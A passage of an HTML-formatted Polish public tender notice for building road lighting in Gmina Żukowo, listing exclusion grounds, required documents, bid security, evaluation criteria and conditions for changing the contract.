<br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1. Odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. </span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1)	WYKAZ ROBÓT BUDOWLANYCH (Załącznik nr 5 do SIWZ) - wykaz robót budowlanych potwierdzający spełnienie warunku w zakresie doświadczenia. W wykazie należy wskazać roboty wykonane w okresie ostatnich pięciu lat przed upływem terminu składania ofert. Do wykazu należy dołączyć dowody określające czy roboty zostały wykonane należycie, zgodnie z przepisami prawa budowlanego i prawidłowo ukończone. Dowodami są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane. Jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca niej jest w stanie uzyskać tych dokumentów - inne dokumenty.2)	WYKAZ OSÓB (Załącznik nr 6 do SIWZ) - wykaz osób, które zostaną skierowane przez wykonawcę do realizacji zamówienia i potwierdzający spełnienie warunku w zakresie dysponowania osobami o wymaganych kwalifikacjach zawodowych. </span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiejzamiast dokumentów o których mowa w pkt III.4) składa dokument lub dokumenty wystawione wkraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacjiani nie ogłoszono upadłości. Dokumenty powinny być wystawione nie wcześniej niż 6 miesięcy przedupływem terminu składania ofert. 2. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejscezamieszkania, nie wydaje się dokumentów o których mowa wyżej, wykonawca składa oświadczenie,ze wskazaniem osoby lub osób uprawnionych do jego reprezentacji lub oświadczenie osoby, którejdokument dotyczy, złożone przed notariuszem lub organem sądowym, administracyjnym albosamorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejscezamieszkania wykonawcy lub miejsce zamieszkania tej osoby. Oświadczenie powinno być wystawionenie wcześniej niż 6 miesięcy przed upływem terminu składania. 3. Jeżeli wykonawca polega nazasobach innych podmiotów na zasadach określonych w art. 22a ustawy PZP, zamawiający będzieżądał przedstawienia w odniesieniu do tych podmiotów: 1) odpisu z właściwego rejestru lub centralnejewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestrulub ewidencji. Postanowienia podane wyżej w pkt. 1- 2 stosuje się odpowiednio do innych podmiotów.4. Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnieniawobec nich podstaw wykluczenia oraz spełnienia - w zakresie, w jakim powołuje się na ich zasoby -warunków udziału w postępowaniu, składa także oświadczenie - Załącznik nr 4 (4.1, 4.2) do SIWZdotyczące tych podmiotów. 5. W przypadku wspólnego ubiegania się o zamówienie przezwykonawców oświadczenie - Załącznik nr 4 (4.1, 4.2) do SIWZ, składa każdy z wykonawcówwspólnie ubiegających się o zamówienie. Oświadczenie to ma potwierdzać spełnianie warunków w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia z udziału w postępowaniu. 6. Jeżeliwykonawca wskaże dostępność oświadczeń lub dokumentów w formie elektronicznej pod określonymiadresami internetowymi ogólnodostępnych i bezpłatnych baz danych, zamawiający samodzielniepobierze wskazane przez wykonawcę oświadczenia lub dokumenty (Załącznik nr 3 do SIWZ). 7. Jeżeliwykonawca wskaże oświadczenia lub dokumenty, które znajdują się w posiadaniu zamawiającego, tozamawiający w celu potwierdzenia okoliczności o których mowa w art. 25 ust. 1 pkt 1 i 3 ustawy PZP,skorzysta z posiadanych oświadczeń lub dokumentów o ile są one aktualne (Załącznik nr 3 do SIWZ).8. Wraz z ofertą wykonawca składa 1) pełnomocnictwo (o ile dotyczy), 2) zobowiązania (Załącznik nr7 do SIWZ) innych podmiotów (o ile dotyczą), 3) formularz cenowy (Załącznik nr 8 do SIWZ).</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">1. Oferta powinna być zabezpieczona wadium w wysokości; Część 1 - 3.200,00 PLN (słownie: trzy tysiące dwieście złotych 00/100); Część 2 - 1.900,00 PLN (słownie: jeden tysiąc dziewięćset złotych00/100); Część 3 - 4.100,00 PLN (słownie: cztery tysiące sto złotych 00/100). 2. Wadium może byćwniesione w: 1) pieniądzu; 2) poręczeniach bankowych, lub poręczeniach spółdzielczej kasyoszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym; 3)gwarancjach bankowych; 4) gwarancjach ubezpieczeniowych; 5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity - Dz. U. z 2019 r., poz. 310). 3. Wadium w formiepieniądza należy wnieść przelewem na konto nr 27 8345 1029 0202 9045 2000 0003 w BankuSpółdzielczym w Tczewie O/Żukowo. Przy wnoszeniu wadium należy powołać się na oznaczenie,,Budowa oświetlenia drogowego na terenie Gminy Żukowo - Część ............" (wpisać odpowiedninr części zamówienia). 4. Zasady wnoszenia wadium zostały opisane w SIWZ.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres rękojmi</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1.	Zmiany umowy muszą być zgodne z art. 144 ustawy prawo zamówień publicznych, następują za zgodą obu stron i wymagają formy pisemnej pod rygorem nieważności. Zmiany nie mogą naruszać odpowiednich uregulowań zawartych w prawie zamówień publicznych.2.	Poza innymi przypadkami wymienionymi w umowie, przewiduje się możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. Postanowienia umowy mogą ulec zmianie w niżej przedstawionych okolicznościach.1) Zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron umowy.2) Powstanie rozbieżności lub niejasności w rozumieniu pojęć użytych w niniejszej umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie niniejszej umowy w celu jednoznacznej interpretacji zapisów przez strony umowy.3) Wystąpią przyczyny niezależne od stron umowy, które będą skutkowały koniecznością zastosowania innych rozwiązań, gdy zastosowanie rozwiązań przewidzianych w specyfikacji istotnych warunków zamówienia i specyfikacjach technicznych wykonania i odbioru robót budowlanych groziłoby niewykonaniem lub wadliwym wykonaniem przedmiotu zamówienia.4)	Wystąpienia warunków geologicznych, geotechnicznych lub hydrologicznych, znalezisk archeologicznych, występowania niewybuchów lub niewypałów, które mogą skutkować w świetle dotychczasowych założeń niewykonaniem lub nienależytym wykonaniem przedmiotu zamówienia.5)	Wystąpienie warunków terenu budowy odbiegających w sposób istotny od przyjętych w dokumentacji projektowej, w szczególności napotkanie niezinwentaryzowanych lub błędnie zinwentaryzowanych sieci, instalacji lub innych obiektów budowlanych.6) Konieczność realizacji robót wynikających z wprowadzenia w dokumentacji projektowej zmian uznanych za nieistotne odstępstwo od projektu budowlanego zgodnie z obowiązującymi przepisami prawa budowlanego.7) Wystąpią środki ochrony prawnej w postępowaniu o zamówienie publiczne uniemożliwiające wykonanie zamówienia w terminie wskazanym w postępowaniu. 8) Wystąpi zmiana zakresu robót budowlanych realizowanych w podwykonawstwie, zmiana Podwykonawcy, skorzystanie z Podwykonawcy w sytuacji kiedy Wykonawca nie przewidywał realizacji zamówienia w podwykonawstwie.9)	Wystąpi zmiana Podwykonawcy (innego podmiotu), na zasoby którego Wykonawca powołał się w celu wykazania spełnienia warunków udziału w postępowaniu.10) Wystąpi zmiana osób, które będą brały udział w realizacji zamówienia. 11) Odstąpienie od realizacji zamówienia lub ograniczenie zakresu robót budowlanych objętych zamówieniem przez Zamawiającego.12) Przerwy w realizacji zamówienia na skutek działań podmiotów trzecich np. przedłużenie terminów wydania przez organ administracyjny lub inne podmioty wymaganych badań, ekspertyz, uzgodnień, decyzji z przyczyn niezawinionych przez Wykonawcę.13)	Konieczność wykonania robót dodatkowych / zamiennych, które będą niezbędne dla prawidłowej realizacji przedmiotu zamówienia.15) Przedłużenia odbiorów przez innych gestorów sieci i urządzeń z przyczyn niezawinionych przez Wykonawcę.16)	Wystąpienie warunków atmosferycznych, niszczących wykonane roboty lub uniemożliwiających kontynuację robót.17) Wystąpienie niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji.18) Czasowe wstrzymania robót przez Zamawiającego lub inny uprawniony organ z przyczyn niezależnych od Wykonawcy.3. Zmiany o których mowa w ust. 2 mogą prowadzić do zmiany wysokości wynagrodzenia Wykonawcy oraz zmiany terminu realizacji zamówienia.4. Zmiana terminu realizacji zamówienia będzie możliwa jeżeli zostanie wskazana przyczyna opóźnienia, jej wpływ na realizację robót / zamówienia oraz okres opóźnienia. Przedłużenie terminu realizacji zamówienia będzie możliwe o okres takiego opóźnienia lub o czas jaki jest konieczny dla wykonania przedmiotu zamówienia po wprowadzonych zmianach ( jeżeli będzie on dłuższy od czasu wykonania przewidzianego dla Wykonawcy przed taką zmianą). 5. W przypadku uzgodnienia pomiędzy stronami skrócenia terminu realizacji przedmiotu zamówienia, Zamawiający dopuszcza zmianę skutkującą skróceniem terminu realizacji o którym mowa w § 17 umowy.6. Wynagrodzenie za roboty zaniechane / zamienne / równoważne / prace dodatkowe oraz wynikające ze zmiany materiałów / technologii będzie ustalane w trakcie negocjacji z Wykonawcą z uwzględnieniem składników cenotwórczych zaoferowanych w przetargu, a w przypadku ich braku w oparciu o:1)	stawki roboczogodziny na poziomie średnich cen Sekocenbud dla regionu pomorskiego - województwo ogółem,2) ceny materiałów i najmów sprzętu oraz wskaźniki narzutów na poziomie średnich cen krajowych Sekocenbud.	W przypadku wyceny przygotowywanej w oparciu o oferty lub faktury zakupu Zamawiający zastrzega sobie możliwość ich sprawdzenia i uzyskania niezależnych ofert na materiały lub usługi. Wykonawca sporządza protokół konieczności wraz z kosztorysem uproszczonym, które muszą być sprawdzone i zatwierdzone Zamawiającego.7. Warunki dokonywania zmian:1) inicjowania zmian na pisemny wniosek Wykonawcy lub Zamawiającego,2) uzasadnienie konieczności i wpływu zmian na realizację zamówienia: protokoły konieczności, kosztorysy robót zamiennych, zaniechanych, dodatkowych, odniesienie do postanowień specyfikacji istotnych warunków zamówienia,3)	w formie pisemnego aneksu do umowy pod rygorem nieważności takiej zmiany, a w przypadku Podwykonawców należy podać zakres zamówienia realizowany w podwykonawstwie, wysokość wynagrodzenia Podwykonawcy, termin realizacji robót budowlanych / dostaw / usług.8. W terminie do 5 dni od dnia otrzymania wniosku o którym mowa w ust. 7 wraz z propozycją wyceny robót (jeżeli wniosek obejmuje zmianę wynagrodzenia) oraz informacjami uzasadniającymi żądanie zmiany umowy, inspektor nadzoru inwestorskiego zobowiązany jest do pisemnego ustosunkowania się do zgłoszonego żądania zmiany umowy, i odpowiednio propozycji wyceny robót, i przekazania wniosku Zamawiającemu wraz z uzasadnieniem, zarówno w przypadku odmowy jak i akceptacji żądania zmiany.9. W terminie do 7 dni od dnia otrzymania wniosku z żądaniem zmiany, zaopiniowanego przez inspektora nadzoru inwestorskiego, Zamawiający powiadomi Wykonawcę o akceptacji żądania zmiany umowy lub odpowiednio o braku akceptacji zmiany umowy.10. Zmiana osób, w tym kierownika budowy, może nastąpić w przypadku:1) zdarzeń losowych niezależnych od Wykonawcy,2) utraty uprawnień przez wskazane przez Wykonawcę osoby.11. W przypadku zmiany osób Wykonawca winien przedstawić Zamawiającemu uzasadnienie konieczności zmiany osób i nowe osoby o nie gorszych kwalifikacjach i uprawnieniach w stosunku do osób, które zostały wskazane w ofercie Wykonawcy i spełniających wymagania opisane w specyfikacji istotnych warunków zamówienia.12. Dopuszczalne są zmiany umowy wynikające z przepisów art. 144 ustawy prawo zamówień publicznych. 13.	Zmiany zapisów umowy, które nie odnoszą się do treści oferty, wymagają pisemnego aneksu. Za zmiany takie uważa się np.:1) zmianę koordynatora ze strony Zamawiającego,2) zmiany teleadresowe i związane z obsługą administracyjno - organizacyjną umowy,3) zmiany będące następstwem sukcesji uniwersalnej po jednej ze stron umowy.14. Strony zobowiązane są do powiadomienia na piśmie o zmianach o których mowa w ust. 13.15.	W przypadku zmiany przepisów prawa lub wydania przez odpowiednie organy nowych wytycznych lub interpretacji dotyczących stosowania przepisów dotyczących ochrony i przetwarzania danych osobowych, Zamawiający dopuszcza zmiany sposobu realizacji umowy lub zmiany zakresu świadczeń Wykonawcy wymuszone takimi zmianami prawa. Zamawiający wystąpi do Wykonawcy celem wprowadzenia zmian w 